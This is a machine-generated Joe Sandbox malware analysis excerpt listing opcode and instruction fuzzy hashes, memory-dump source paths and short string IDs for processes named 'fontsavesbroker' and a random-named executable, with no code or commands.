                • Opcode Fuzzy Hash: 31bb91a89b2a4aa37d96d329557f0190d4bb9e63eb18d13b92c0d335f1e98594
                • Instruction Fuzzy Hash: 9C11B671B0AA4E4EDB95EBA884B96F937A0EF59311F05057EC419CB4F2DA346601C700
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7ee56e7a7c855ec480ee8b5da7b588a6b67e4c9e42486fe6f526400ca769ee97
                • Instruction ID: e5542a32de94207325f3b88e7fecb323dfcfea97a18b4be63ac193b195167f6f
                • Opcode Fuzzy Hash: 7ee56e7a7c855ec480ee8b5da7b588a6b67e4c9e42486fe6f526400ca769ee97
                • Instruction Fuzzy Hash: 1311A120A4F7C64EDB2257A844B04607FE49F07215B2E46FAD0D8CA4F3DA2C5E8AC312
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c0aba59adad01b5a761cca7f0acb3640fb7aaf5941ee05de6839c149d0deac08
                • Instruction ID: 45b9359d18f5cc341c46d22732f7299f4db9e7e814f1966bd53e6475a5452a66
                • Opcode Fuzzy Hash: c0aba59adad01b5a761cca7f0acb3640fb7aaf5941ee05de6839c149d0deac08
                • Instruction Fuzzy Hash: 76119430A09A0E9FEB58EFA8C4696BD76E1FF58341F11067ED41DC21B5DE34A550C740
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8b5ea40f0d93cb04b7194676a5645d40cfd3aec54b410b644a2e384e193ee46a
                • Instruction ID: 5926f2d95b0cac9c77b37bd3f9fc0727653e5106732b3b3ba9ac3816bf8b22c4
                • Opcode Fuzzy Hash: 8b5ea40f0d93cb04b7194676a5645d40cfd3aec54b410b644a2e384e193ee46a
                • Instruction Fuzzy Hash: 56117030A09A0E8FDB54EBB4D4A95B977A0FF14301F15057ED41DC70A2DE346550C740
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4fdac2ea243e1bff63edd44240dc14cd901bd006832010bcba09838716cd4806
                • Instruction ID: 7411270e7ffbd0dbfb4857ee2979061fe7918fdfb59d519cbb1b209113cf1674
                • Opcode Fuzzy Hash: 4fdac2ea243e1bff63edd44240dc14cd901bd006832010bcba09838716cd4806
                • Instruction Fuzzy Hash: 26116131A0AA4E9FDB94EF64C4A96BD7BE1FF14301F1509BEC419C71B2DA356640C710
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0428aa7d5ffca10b7564aa7c0ef8cefbb1829796aae90085cbe22623e49dd00c
                • Instruction ID: 283e98f1692ab6399302431e5b2c95bb7b7cf9867481484e52e8bcef6e50ed06
                • Opcode Fuzzy Hash: 0428aa7d5ffca10b7564aa7c0ef8cefbb1829796aae90085cbe22623e49dd00c
                • Instruction Fuzzy Hash: 64018030A05A0E8EDB58EF65C0A56B977A1FF58306F11057AD41EC35E5CA31A650C740
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62ee937e51f3e07d249109ff4d783cee4b4fa14276fcf08a1bc60646fa3cbd8e
                • Instruction ID: 476ea606d3f197495a59d61d14e9526c1a594d9800851b2a74c4a79ca12942b1
                • Opcode Fuzzy Hash: 62ee937e51f3e07d249109ff4d783cee4b4fa14276fcf08a1bc60646fa3cbd8e
                • Instruction Fuzzy Hash: 60014C70E15A0E8EEB55EBA4D4A86B976A0FF18306F11097AE81AD21A4DE3066508700
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b02b37cf07661dced2d40a7624befea9a636c96e8b62e8568968e344656e2a56
                • Instruction ID: 271303857de9f89e51cf35cda1a14b4e5f8467efc0c5f8d9333750bea28b22db
                • Opcode Fuzzy Hash: b02b37cf07661dced2d40a7624befea9a636c96e8b62e8568968e344656e2a56
                • Instruction Fuzzy Hash: FC01A230E1E64E8FE791EBA4C4A99A93BE0EF19302F0655BAC40CC70B6DB38E544C710
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c455a880ab256d6e72d7028f2aef16a76b559675cbdced5cf80ae0f542f3b79
                • Instruction ID: 3bcec0b4e50bea2ad5263caa9c5da7c89b06f376c95b56766dbfa72852cffc77
                • Opcode Fuzzy Hash: 1c455a880ab256d6e72d7028f2aef16a76b559675cbdced5cf80ae0f542f3b79
                • Instruction Fuzzy Hash: 31011A30A15A0E8EEB94FBA4D4686BE76E1FF28305F11057AD41ED21A5DB31A650CB40
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 57d89708434cb92abbbb1fcf7fbd6943fa329b6f0efc8e531de8a1c2df362836
                • Instruction ID: 34e3f642b026df572f0b6fba3045431150c028b92de41d0214ff6309fa860402
                • Opcode Fuzzy Hash: 57d89708434cb92abbbb1fcf7fbd6943fa329b6f0efc8e531de8a1c2df362836
                • Instruction Fuzzy Hash: 7A01F970A0AB8E8FDB64DF6484655B97BA1FF59302F45017AD40CC74F1DB359550C740
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5a33bbc6263d334152b6efdcd57483e7444f0596fe2e96307ed20834e9d189b8
                • Instruction ID: 47cc8e71a8e29cc35ccf228c9e5b974016907f7f35fc227ec58797072316cabc
                • Opcode Fuzzy Hash: 5a33bbc6263d334152b6efdcd57483e7444f0596fe2e96307ed20834e9d189b8
                • Instruction Fuzzy Hash: 6201FC31E0AA4E4FEB61EBA4949D5B97BE0FF15302F0205B6D408C70B5DB34E5448740
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f6c119b8def33dc3843c0d92e68838c7250d0c41ab0634a38b357019254a410
                • Instruction ID: 1e65e223dfb57ad0c3e37f133e9aec647f78ccf160957b5dd6436f99d87804e9
                • Opcode Fuzzy Hash: 4f6c119b8def33dc3843c0d92e68838c7250d0c41ab0634a38b357019254a410
                • Instruction Fuzzy Hash: 93F08C31A1AB9E8FEB94AF6498282FE3BE0FF15205F41057AE818C20A1DB345654C740
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5bb41cb802b51d912ec696100310898696d0ebeb9bb37f41736d6d48ba7c3a4f
                • Instruction ID: 6fcf619138b72d7531704eebec5cb3f855f8ff3feee34443546f5a3574e98954
                • Opcode Fuzzy Hash: 5bb41cb802b51d912ec696100310898696d0ebeb9bb37f41736d6d48ba7c3a4f
                • Instruction Fuzzy Hash: A7018F35A0E74A4FD312EB6898E58E93BB1EF5531171646F3C108CB0B3EE38A4448710
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1b1c5e6571f724889a64df6522f8ee519ab1984cbdc1225a03f952faaa28b393
                • Instruction ID: bb3477dab81f2af78a628d8f37118a55aadd068d13ca89100967e14332c5a04d
                • Opcode Fuzzy Hash: 1b1c5e6571f724889a64df6522f8ee519ab1984cbdc1225a03f952faaa28b393
                • Instruction Fuzzy Hash: 46014831A5EB4D4FD752AB7488A95A97FF1EF15301F0605F6D408C70B6EA74A5448701
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8e2ea3eb3524df938d770dfa9c6e428629301c7d7339c857641fa52facc27f79
                • Instruction ID: cbcb758db4cac9e9fe6113e221144dbf2298ced579e108aa617ca06680a87a2d
                • Opcode Fuzzy Hash: 8e2ea3eb3524df938d770dfa9c6e428629301c7d7339c857641fa52facc27f79
                • Instruction Fuzzy Hash: BA014B30E1AA0E8EE791EB6884D96A977E0EF19301F1155B9D81CC72B6DE34B6448600
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 33917e0474da6873cc0555e741644ac9f9ad5bc996dae72b700ebac683183ec2
                • Instruction ID: a787b1320fa3728a5e7b49ef448699f15a544a21eb19aa7e00da252a620d20c0
                • Opcode Fuzzy Hash: 33917e0474da6873cc0555e741644ac9f9ad5bc996dae72b700ebac683183ec2
                • Instruction Fuzzy Hash: E6014471A1E64E4FD752A7B484995A93BE0EF56312F0645F7C408CB0B7DA38A544C711
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a11dd8394bb633dd76c25b3b73cf6e35b060a5a88a8490b9d0b9b03bfaa0d34b
                • Instruction ID: 18da3ddfac6971d5c3f7d7c3b34992d0d634a55c6371bf090eb16abbac476667
                • Opcode Fuzzy Hash: a11dd8394bb633dd76c25b3b73cf6e35b060a5a88a8490b9d0b9b03bfaa0d34b
                • Instruction Fuzzy Hash: A9018630A15A0E8FDB59EBA4C4A85BA73A0FF18306F51097ED41EC21F5DE35A554CA00
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 54b11f5bebea3bfd60f5014a7dd67f781c8a30b7a1412794803d0219a06e5b20
                • Instruction ID: 393ce38513dbe57424f2b3952624c664b9d824b7b0e284fb92cae39ce7aca3ea
                • Opcode Fuzzy Hash: 54b11f5bebea3bfd60f5014a7dd67f781c8a30b7a1412794803d0219a06e5b20
                • Instruction Fuzzy Hash: 1601D630A05A0E8EDB58EBB4C4A85B973E0FF18306F60057ED41EC21F4DE35A540CB00
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dc22eb5d611f3dcb6b205b4210959964d752f437e91b07235ba34849e18e0e70
                • Instruction ID: 6eebc020c78032c30673447c9c841801362349941ebef5498117d5c4ac3aeece
                • Opcode Fuzzy Hash: dc22eb5d611f3dcb6b205b4210959964d752f437e91b07235ba34849e18e0e70
                • Instruction Fuzzy Hash: 3DF08671B1AA4F49EFA49AA888B86F977E4EF59315F01063AD41DC60F1DA3457148240
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ea8134f7d5dd22558547e5f0e0cb10257b7fc1a47882f10739ca1dacbebfd5bb
                • Instruction ID: 6f11d3f8f1593accc76acecaf51586a45b731f010052d247c32ac0cd9adf206a
                • Opcode Fuzzy Hash: ea8134f7d5dd22558547e5f0e0cb10257b7fc1a47882f10739ca1dacbebfd5bb
                • Instruction Fuzzy Hash: A3F0C230A0AA4E8FEB64EE6594656FA77A0FF19306F11057AE80DC24F1CE35A660CB40
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ea87a3de142a5415ebb5b4f73a9549534b16c87b4df0fb163ce31bc95f83e6e
                • Instruction ID: fa4c40d524d4fbe463519f1985d42bea4d9fa1c9824df8372e20b5054828e555
                • Opcode Fuzzy Hash: 5ea87a3de142a5415ebb5b4f73a9549534b16c87b4df0fb163ce31bc95f83e6e
                • Instruction Fuzzy Hash: 54F09039B0DA0E5FE710FBA8A4E48F937F2EF54315B114AB6D00CC70B6EE34A5844650
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1fc3381ca190a1a951c4db07273bacb1450bdbb12c353a5a6e2cf509a1c10058
                • Instruction ID: 5aa5d3e9988f7ac56f49e98f6f4a84ede25d723d1dbb6ff531d8165a2e21ec02
                • Opcode Fuzzy Hash: 1fc3381ca190a1a951c4db07273bacb1450bdbb12c353a5a6e2cf509a1c10058
                • Instruction Fuzzy Hash: 76F0FF70A1AA1D8FDBA4DB14C499BE9B3B1EF58301F1142E6D00DD3265CF35AA818F40
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b5abc109ddcb14661d3d10235d463f3299fdd70f58bb4f697cf8bbfb878552bc
                • Instruction ID: 18876e2ceb5e985ba001d152a313d339eef2edbbea1bb313d9ad60742b336ff8
                • Opcode Fuzzy Hash: b5abc109ddcb14661d3d10235d463f3299fdd70f58bb4f697cf8bbfb878552bc
                • Instruction Fuzzy Hash: 08F03071E5AA4E8EEFA5EF6888A92FD7AA0FF14302F01053AE919C21B1DB7456508740
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 37d1d222a9a8dca79e20c346ffdb968ffb6b0323b97fb522bb092aa933221c45
                • Instruction ID: f937735faf10d60514f75f5b15bc09f80c5f7b6a2f3538f29334653eb720733b
                • Opcode Fuzzy Hash: 37d1d222a9a8dca79e20c346ffdb968ffb6b0323b97fb522bb092aa933221c45
                • Instruction Fuzzy Hash: E1F0C23190E78D8FDB6A9B6088791A93BA0FF16302F4605BAD409C61F2EA389514C701
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 64a78fa5c064780ae0fecf5e99d7dc425e0b4a886db5e78addbc138b8016fae2
                • Instruction ID: 1cd5384a4e2fd9df8fddc883b86eab12bc3f7a631485c8a48993bd4cee6a1e91
                • Opcode Fuzzy Hash: 64a78fa5c064780ae0fecf5e99d7dc425e0b4a886db5e78addbc138b8016fae2
                • Instruction Fuzzy Hash: 02F0B430A0A78A8FDB599FB484652A93B60FF16202F4545BED80DCA1F2DB38A504C701
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0fe8a46c296d93708f61b05d60e40878e9e488cc7cac960711ac09eb02f71a12
                • Instruction ID: 5184d381838e8a8089b4dd5c86d830d8dfcfa7094479b94906cdc0600710bd16
                • Opcode Fuzzy Hash: 0fe8a46c296d93708f61b05d60e40878e9e488cc7cac960711ac09eb02f71a12
                • Instruction Fuzzy Hash: 8BE0E520F0BE0A46E774925984D557471D19F48315FBA8775F01DC65F1EB3CDE82C201
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3b968759f6c0c951caad449d59be1551ebb0216a9861cdf0737bdc75161eb77f
                • Instruction ID: 313d5b26ef54f8a88d5039c6d74af1377d3cd0dc6315d55126112aa79389fd90
                • Opcode Fuzzy Hash: 3b968759f6c0c951caad449d59be1551ebb0216a9861cdf0737bdc75161eb77f
                • Instruction Fuzzy Hash: 6AE04574A59A2E9EDBA8DB48C894BB977B1FB58302F5111B9D11DD32A1DA305A808F04
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e48b8d8d78ead12cf4239562d578f06b141cb1a156202681a4e36c2d0b9765da
                • Instruction ID: 630a0b352b99c500ad212835df280e3d4635ca4dc74e761fa6b8807f5214e5ed
                • Opcode Fuzzy Hash: e48b8d8d78ead12cf4239562d578f06b141cb1a156202681a4e36c2d0b9765da
                • Instruction Fuzzy Hash: E5F0AC34A09A5D8BDB25EB04C8917AD73B6EB94302F1546A5D00D972A5CB746B818B41
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b192cd5b06488316db087836aa4ddda2474db24bc0158c281008add675c9bdd3
                • Instruction ID: 92e7dd44096eb567c5780a72d3b0cc3094c2e3b84c6ea81aaf4c43f33e5d6a52
                • Opcode Fuzzy Hash: b192cd5b06488316db087836aa4ddda2474db24bc0158c281008add675c9bdd3
                • Instruction Fuzzy Hash: 24E052B0E0960E9FDB28DF94D4E55FDB7B1BF14301F610539E419A32B1CA3869508B40
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28bdbf73e458c66e6c73acbfe0d9b65e8ec568619fc3506dfaa08a2ca4efe61c
                • Instruction ID: ef946c5ff71a100aa638b4bec67e8d4e1f3a178f76cd03da9d02765a4a7e5887
                • Opcode Fuzzy Hash: 28bdbf73e458c66e6c73acbfe0d9b65e8ec568619fc3506dfaa08a2ca4efe61c
                • Instruction Fuzzy Hash: BDD0E231A0894D8ECF50EFC8D4809ECBBB0EF58301F000022D10CD2260CA30A4508B40
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: '$H$U$[$i
                • API String ID: 0-3970984591
                • Opcode ID: 1038e454c1c1a2dfc0abafdae40b95744a7679b55e81dde3abd8c4275def21d0
                • Instruction ID: 5dcce3a1f6a5be307a1df0a6d7c3ae21bd6ff14f56ae1f5023227ff9755862ee
                • Opcode Fuzzy Hash: 1038e454c1c1a2dfc0abafdae40b95744a7679b55e81dde3abd8c4275def21d0
                • Instruction Fuzzy Hash: F641B470E09A6E8EDBA4DF54C8947EDB7B1AF58302F0046EAD40DE62A1DB745A808F41
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: "$A$L$\
                • API String ID: 0-4177883558
                • Opcode ID: 4d1d45387c7b8343f1dc999f694d8d040ac03ee51de334f83e2cd765078e58e9
                • Instruction ID: bc27a8e51c7699a60306ebf18e3fbb4e68b9c4402542964d901416e8540d9098
                • Opcode Fuzzy Hash: 4d1d45387c7b8343f1dc999f694d8d040ac03ee51de334f83e2cd765078e58e9
                • Instruction Fuzzy Hash: 6341D570E0966D8BDB64DF54D894BEDB7B1FB58301F0046EAD40DA72A1CB786A818F44
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b791000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: "$+$/$]
                • API String ID: 0-387013541
                • Opcode ID: db89f9d211b9fa6e6ec247edfa98c3d334e124217f62501f17233b9cbf114412
                • Instruction ID: 2662eef6a6358f37c393ac5193bea78ac238854052052fa05af28edf99ac7e58
                • Opcode Fuzzy Hash: db89f9d211b9fa6e6ec247edfa98c3d334e124217f62501f17233b9cbf114412
                • Instruction Fuzzy Hash: 9951D770E0932D8FEB68DF94C8A47EDB6B1AF54301F4142BAD00DA76A1CB385A84DF11
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: UAVW
                • API String ID: 0-3038902782
                • Opcode ID: 936950452c2ee8172b7861a8f0df3be34d5940d88a6ef245b43a2de98891f5c7
                • Instruction ID: 7f33a4bdd5fa05d1017daca2486dbb008da4106fbe8cecb9178a5a5039a65b57
                • Opcode Fuzzy Hash: 936950452c2ee8172b7861a8f0df3be34d5940d88a6ef245b43a2de98891f5c7
                • Instruction Fuzzy Hash: 1981BE31B0DF494FDB59DE5C88A16A977E2EF98301B15067EE45EC32A2DE34A9028781
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b78a000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: _
                • API String ID: 0-701932520
                • Opcode ID: 77d2f5fa6213612cffd89be8029aa62747a96f7e3673fd0f0c257cd024c943da
                • Instruction ID: 5cf4159ee7b88a3ddc49f9ae3819611df2f69901f5444f86c4dc318afd73c0a1
                • Opcode Fuzzy Hash: 77d2f5fa6213612cffd89be8029aa62747a96f7e3673fd0f0c257cd024c943da
                • Instruction Fuzzy Hash: CD51282B74DA2A4AE7547BBCB8914FD7340EF90376F044277E10DC90A7DE3825468AD1
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: UAVW
                • API String ID: 0-3038902782
                • Opcode ID: 9788fc4f12b6a6153f8fb75c4d51095830cd95d576a3dd673e6e968e69c586a3
                • Instruction ID: dd57e33121059b74bf564adb196707601093a4c39fcfff9eec88c30b9ee3a1c4
                • Opcode Fuzzy Hash: 9788fc4f12b6a6153f8fb75c4d51095830cd95d576a3dd673e6e968e69c586a3
                • Instruction Fuzzy Hash: 35510630B18B894FDB5CDE1888A16B977E2FF98301F15467ED45EC72A1CE34A802C781
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: WVSH
                • API String ID: 0-4131290416
                • Opcode ID: fb62c6f272e3da4ee261e15cf129157780f69435ada02b70500d7899fefe63e9
                • Instruction ID: 7873a7e5ca7f1d5a0c86389f74e035a1034983931cf20cd5d5657d476e5db999
                • Opcode Fuzzy Hash: fb62c6f272e3da4ee261e15cf129157780f69435ada02b70500d7899fefe63e9
                • Instruction Fuzzy Hash: 39415831F0EA4A4FD396DBB884A55B877E0EF85302F0642BAD44CC31B6DE38A9428341
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B78F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b78f000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: k
                • API String ID: 0-140662621
